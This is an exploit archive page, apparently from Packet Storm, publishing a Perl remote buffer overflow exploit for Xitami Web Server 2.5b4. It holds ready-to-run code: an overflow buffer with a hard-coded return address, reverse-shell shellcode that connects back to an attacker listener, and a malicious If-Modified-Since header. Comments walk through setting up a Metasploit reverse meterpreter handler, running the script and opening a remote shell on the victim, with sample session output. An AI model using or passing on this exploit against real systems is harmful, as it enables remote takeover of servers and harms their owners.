what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Xitami Web Server 2.5b4 Remote Buffer Overflow

Xitami Web Server 2.5b4 Remote Buffer Overflow
Posted Jun 3, 2011
Authored by mr.pr0n

Xitami Web Server version 2.5b4 remote buffer overflow exploit that spawns a shell.

tags | exploit, remote, web, overflow, shell
SHA-256 | d74f1c9cc0694320046e368dd4c524292f1aa8c23e024ab073a7ec3cae132bc9

Xitami Web Server 2.5b4 Remote Buffer Overflow

Change Mirror Download
#!/usr/bin/perl
# -------------------------------------------------------------
# Xitami Web Server 2.5b4 - Remote Buffer Overflow Exploit.
# Exploit coded by mr.pr0n [http://s3cure.gr] .
# Many greetz to krumel for his help :-).
# -------------------------------------------------------------
# -------------------------------------------------------------
# Tested on: Xitami 2.5b4 / English Windows XP - SP3
# -------------------------------------------------------------
# ------------------------------------------------------------------------
# Bug for 2.5c2 discovered by Krystian Kloskowski (h07) <h07@interia.pl>
# -------------------------------------------------------------------------
#
# ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ *
#
# --------------------------------
# Quick user guide!
# --------------------------------
# 1st Step: Set up the listener.
# --------------------------------
# msf > use multi/handler
# msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_ord_tcp
# PAYLOAD => windows/meterpreter/reverse_ord_tcp
# msf exploit(handler) > set LHOST 192.168.178.25
# LHOST => 192.168.178.25
# msf exploit(handler) > exploit
#
# [*] Started reverse handler on 192.168.178.25:4444
# [*] Starting the payload handler...
#
# --------------------------------
# 2nd Step: Execute the exploit.
# --------------------------------
# root@bt:~# cd Desktop/
# root@bt:~# ./Xitami2_5b4.pl
#
# #----[ mr.pr0n ]---------------------------------------------------------#
# # Target App: Xitami Web Server 2.5b4 #
# # Attack : Remote Buffer Overflow Exploit. #
# # Target OS : Windows XP Pro English [Service Pack 3]. #
# #---------------------------------------------[ http://s3cure.gr ]-------#
#
# Enter your target's IP (e.g.: 192.168.0.123)
# > 192.168.178.37
#
# [*] Sending the evil header at: 192.168.178.37 ...
# [*] OK, exploitation Done!
# [*] Check please for the shell...
#
# --------------------------------
# 3nd Step: N'joy your shell :-)
# --------------------------------
# [*] Transmitting intermediate stager for over-sized stage...(216 bytes)
# [*] Sending stage (749056 bytes) to 192.168.178.37
# [*] Meterpreter session 1 opened (192.168.178.25:4444 -> 192.168.178.37:1031) at 2011-05-31 02:13:33 +0300
#
# meterpreter > sysinfo
# Computer : xxxxxx-xxxxxx
# OS : Windows XP (Build 2600, Service Pack 3).
# Architecture : x86
# System Language : en_US
# Meterpreter : x86/win32
# meterpreter > shell
# Process 320 created.
# Channel 1 created.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Xitami>
#
# ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ *
#

use IO::Socket;
print "\n#----[ mr.pr0n ]---------------------------------------------------------#\n";
print "# Target App: Xitami Web Server 2.5b4 #\n";
print "# Attack : Remote Buffer Overflow Exploit. #\n";
print "# Target OS : Windows XP Pro English [Service Pack 3]. #\n";
print "#---------------------------------------------[ http://s3cure.gr ]-------#\n";

print "\nEnter your target's IP (e.g.: 192.168.0.123)";
print "\n> ";
$target=<STDIN>;
chomp($target);

#---------------------------#
$junk = "\x41" x 72; # 72 x "A".
$RET = "\x53\x2b\xab\x71"; # ws2_32.dll push ESP - ret - (Windows XP SP3 - [En]).
$jmp = "\xeb\x22"; # JMP +0x22.
$nops = "\x90" x 100; # 100 Nops.
#---------------------------#

# ./msfpayload win32_reverse_ord EXITFUNC=thread LHOST=192.168.178.25 LPORT=4444 R | ./msfencode -e PexAlphaNum
# [*] Using Msf::Encoder::PexAlphaNum with final size of 261 bytes

$shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x41\x33\x4b\x4d".
"\x46\x56\x4b\x48\x43\x34\x42\x43\x4b\x48\x42\x44\x4e\x30\x4b\x48".
"\x42\x55\x4e\x31\x4b\x38\x44\x31\x4b\x48\x44\x37\x42\x42\x4d\x4a".
"\x4d\x4a\x50\x54\x43\x50\x48\x30\x4d\x53\x44\x43\x43\x53\x4f\x45".
"\x44\x33\x45\x37\x4f\x4e\x4b\x58\x4c\x36\x4a\x50\x4b\x58\x45\x54".
"\x4e\x33\x4b\x38\x4e\x54\x45\x50\x4a\x47\x4b\x58\x4e\x44\x4d\x50".
"\x4e\x41\x41\x30\x49\x4e\x4b\x58\x41\x34\x4a\x55\x41\x50\x4a\x4e".
"\x4b\x48\x41\x57\x4e\x53\x41\x50\x50\x4e\x43\x50\x49\x36\x4e\x50".
"\x43\x55\x4c\x46\x41\x30\x4c\x36\x44\x30\x4f\x4f\x42\x4d\x47\x39".
"\x4a\x36\x42\x4c\x4a\x4a\x44\x4b\x49\x51\x4a\x36\x44\x50\x42\x50".
"\x41\x31\x4e\x35\x49\x58\x41\x4e\x43\x35\x47\x4b\x4e\x50\x43\x35".
"\x41\x45\x47\x55\x41\x45\x4c\x56\x42\x41\x41\x55\x47\x35\x48\x55".
"\x4f\x4f\x45\x4e\x5a";

if ($socket = IO::Socket::INET->new
(PeerAddr => $target,
PeerPort => "80",
Proto => "TCP"))

{
$exploit = $junk.$RET.$jmp.$nops.$shellcode;
#
#---------------------------------#
# If we send an If-Modified-Since header,
# containing an overly long string (for example our exploit)
# it may be possible to execute (remotely) a payload!!
#---------------------------------#
#
# This is the evil header! }:-)
$header =
"GET / HTTP/1.1\r\n".
"Host: ".$target." \r\n".
"If-Modified-Since: p0wnp0wnb00m! "." $exploit\r\n";
print "\n[*] Sending the evil header at: $target ...\n";
print $socket $header."\r\n";
sleep(1);
close($socket);
print "[*] OK, exploitation Done!\n";
print "[*] Check please the shell..\n\n";
}

else
{
print "[-] Connection to $target failed!\n";
}

Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close